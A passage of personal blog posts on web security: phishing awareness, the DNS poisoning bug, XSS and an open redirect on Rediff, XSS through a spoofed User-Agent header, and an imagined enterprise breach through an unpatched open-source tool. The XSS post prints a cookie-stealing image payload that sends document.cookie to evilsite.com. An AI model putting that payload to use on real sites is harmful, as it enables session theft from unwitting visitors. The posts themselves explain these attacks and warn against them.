Aug 03

Escape from Phishing Nets

Tagged as , , , , under Info Is Wealth, Technology 2 Comments »

Recently, too much action happening when it comes to email accounts. Couple of friends complained that they’ve lost their logins all of a sudden. One friend from college complained that his girl’s email account was compromised. They believe that some hacker at brazil opened his terminal and wrote ./hack user@gmail.com to hack them. Few really think that it as simple as opening Microsoft Word and write “Access Granted” in Green color to hack.

I want to tell them one thing. These days, most of the email services are fairly secure ( *cough* *cough* Not talking about rediff which added ssl login a month before or India times which use to save password in cookie as plain text) But, I’m talking about services like Gmail or Yahoo. But, we need to accept the fact that even though we are intelligent and we’ve some protection on our computers like Antivirus, firewalls for windows folks, or like my friend Hari tells, install Linux, or as Ashok suggests OS X … we are busy most of the time. Some times, we don’t use our brain while doing some small things.

You would be talking to your friend on mobile phone and checking orkut for new scraps. The guy one phone might be telling you about his new project or something like that and you are involved in the chat. There could be some scrap from a girl … Karteek, greeting card for you !!! As usual, we click on the link, and it tells you that you need to login to view the card and you just login while talking on phone.

[Recap]

What happened ? -> You clicked on the link

After that ? -> It asked you to login

Then ? -> You logged in

Then -> It might tell you to login again as your password is wrong

After that ??? -> You logged in or it logged you in automatically or you just left it

Now, the analysis part. Well, nothing big happened. You were just Phished. You tried to login to a service on a fake login screen. You might lose many things through that username and password (your email might have much info).

Now, coming to the important part, how to escape from it ? Well, be careful is my answer. But, I know that I told you that we might just get carried away sometimes. For that I coded a small greasemonkey script which will protect you from low level phishing attacks. Yes, only low level. If the hacker is intelligent, he can game it easily, but most of the time intelligent hackers have much more useful things to do than to hack you. So, dont worry much about it.

The script is well commented. It doesn’t do wonders but just serves the purpose. Feel free to edit it make it more useful and share with others. I dont care about licenses, so I don’t mind even if you tell your girl friend that you coded it to protect her from being phished ;)

Very important. Never ever install a greasemonkey script unless you read it and damn sure that its secure. Anyway, you can find the script here.

Update : Code made little more logical. Now it won’t annoy much. And by default, I made it support Google, Yahoo, Hotmail and Wordpress. Adding other services is very easy.

Aug 01

DNS Vulnerability and our stupid ISPs

Tagged as , , , , , under Info Is Wealth, Technology No Comments »

Guess you know what is DNS ?
If you don’t know what it is …
Its Domain Name System. All the servers will have some set of numbers to identify them (IP), to recognize them easily we give them a name (domain name) and for internet to work, DNS maps these names to numbers. (Duh, read wikipedia for more info)

For the techie folks who know whats DNS, you might have missed this news. There was a bug. It was just a bug when people din’t know. Few days before , its was a problem as bad people know that it exists. And couple of days before, it became a major problem as bad people got to know how to tame the bug and exploit it. And today, its frigging Pain in the A** as our dumb ISPs are not fixing their DNS servers.

Well, the bug is that bad people can manipulate DNS lookups. Which literally means, when you open Google.com, then can send you to Yahoo.com too. Search engines need not be a problem, but if they manipulate DNS of a bank … the answer is … somebody is gonna get hurt real badddddd

So, I request you to check (@Doxpara) whether your DNS server is vulnerable to such bug or not, and if it is, change it to OpenDNS (208.67.222.222 and 208.67.220.220) and stay secure. As of today, I’ve tested BSNL and Airtel DNS servers (Chennai) and both of them are vulnerable. Guess, we need to take a huge rod and shove it up into someone’s a** and make them fix their DNS servers so that we can stay secure.

For extra-super-terrestial technical folks, I need not tell you about this, but incase you missed it, check (@Securebits) the exploiter released.

Jan 19

Rediff’s Free URL redirection service

Tagged as , , , under Info Is Wealth, Technology 2 Comments »

Something more free from Rediff ?
Hell Yeah.

Whats that ?
URL redirection service.

Ads ?
Come on, its rediff, there will be Ads.

What makes it different from other URL redirection services ?
Other URL redirection services are created by themselves. Here, even rediff doesn’t know that it got one too !!!

What ?
okay, in clear words, yet another stupid implementation by rediff.

Where ?
here - > http://www.rediff.com/login/inredirect.php?url=http://karteek.selfdabba.com

What does it do ?
Arghh !!! Click on it !! -> K World

Wow. Anything more in it ?
Uhmm, you want more and rediff will never say No. Yeah, it got XSS in it too.

Double Wow. Show me, show me !!
Well, Neither I can tell no. Click this.

Can I use it for anything more ?
Hell, yeah. How about printing your name there on that page ?

Triple Wow. Show me, show me.
Dude, not going to show you this. But, yeah. Will give you a hint. Document.write in Javascript. And you know how to inject javascript into that page

What ? Do I know ?
Fck. Thats why I should have kept a disclaimer on the top that this post aint for everyone. XSS is Cross Site Scripting, where you would just inject javascript in to another site.

Oh. okay. What do I do now ?
Uhmm, how about one fair deal. I will show you all the bugs I/others found in rediff and you stop using it ?

Yeah. I’m in.
Just goto Xssed.com and search for rediff. Lazy guys like me, click this.

Nov 18

Funny way for XSS

Tagged as , , , under Chronicles, Technology No Comments »

Well, its just not funny way, but very funny way. Neither through a HTTP GET nor a HTTP POST. But, it’s through a header. I haven’t read about this method of XSS up to now, but seriously, its silly and common. Usually webmasters read about the traffic of their websites and Referrer, User-Agent are very common headers they analyze to know the type of visitors and from which site they are coming.

I just spoofed my User-Agent header to “<script>alert(1)</script>”, and when I saw the stats page after that guess what, my stats plugin wasn’t sanitizing the input, and I got the alert window.

Now, going back to fix and report it. Take care about looking at your stats (especially in wordpress). One can rather keeping an alert, can keep some thing like this

<img
src=”javascript:document.images[1].src=%22http://evilsite.com/cookie.php?c%3D+document.cookie;”
style=visibility:hidden />

The above code will send the cookie to cookie.php page of evilsite.com and the hacker can collect the cookies there using a very simple code and he can become you just by using those cookies. This page has many vectors to use. It doesn’t teach you how to use, so, if you really know what you have to do, you must be knowing this page already.

Result, check your stats plugins and make sure that they are sanitizing all the inputs. Just don’t trust them. They can be very dangerous. Finishing yet another episode of “How do THEY do it ?”

Oct 25

The Weakest Link - How Would They Do ?

Tagged as , , , under Info Is Wealth, Technology, Underground 1 Comment »

This post is going to be technical. Some truth, some imagination and a bunch of assumptions.

My first assumption is - There is a big company with a portal which is primary means of doing many things across the company. Every employer gets access to the portal which they would use for their daily use.

My second assumption is - The company turns new-technology oriented, and it starts it’s own wiki or micro-blogging or even blogging with in the enterprise.

My third assumption is - The company considers an open source solution for the tool and modifies it a lot so that, by the time it opens it to the regular employees, the open source solution which they used gets an upgrade with the patches for the existing vulnerabilities in their solution.

My fourth assumption is - The company, as it managed to modify the code for making it work seamlessly with their current environment wouldn’t take more pain to upgrade the version of opensource solution which they are using.

Out of these four assumptions, we get a situation with the weakest link - A situation where a modified-but-vulnerable opensource solution is integrated with a company’s portal.

My brain’s assuming part will stop working here and the imagination part starts here. When a new tool is integrated seamlessly to the tool, it would be using LDAP for authentication. It’s a solution that can be easily guessed as well as confirm. When LDAP is being used, the next interesting imagination would be - they will be using a flow - where, if any user tries to login - if the user is first time user, the open source solution will create a profile for him in the solution’s database, or if not, just let him in based on the LDAP authentication.

The above all will work great as long as They are not concentrating on you. But, when They concentrate on you, greatest codes will look vulnerable simple codes. As per the title, I’m going to write “How Would They Do ?” Again, it’s completely imagination as I’m not “good enough in skill” or “bad enough in motive” to be one of Them. Let’s see what would They do.

They will find that the latest added opensource solution is the weakest part of the portal and try to find out the version of the solution. Using the solution, they would find the list of vulnerabilities and try to exploit them. If they succeed at this point, they will try to get complete access over that opensource solution a.k.a new tool. They will make themselves admin on the new tool, and look for possible chances of going further. Some of the current opensource solutions are so-advanced that they allow to edit code of their plugins/themes/core through their interface if the user is administrator. If not that advanced, atleast they allow the administrator to take a backup of the complete database. Both the cases are bad, first being terrible and second being bad enough to hurt.

But, if the case is first, where They got admin rights and They can edit the code, They would simply edit the code to do their work and that is - The solution would add every user and his password to new table on their successful authentication and later they can download the database of users with their un-hashed passwords which is the biggest thing that can go wrong for that total portal. The total compromise.

This is some stupid theory with lots of facts, assumptions and imagination in it. If you understand technology, you can understand the seriousness of simple mistakes we do. If you don’t understand technology, I didn’t expect you to be so bored that you read this post !! And by the way, if you haven’t understand who are They … come on dude, it’s dream of every kid who use computer to become like Them and read their friends’ emails. No more hints.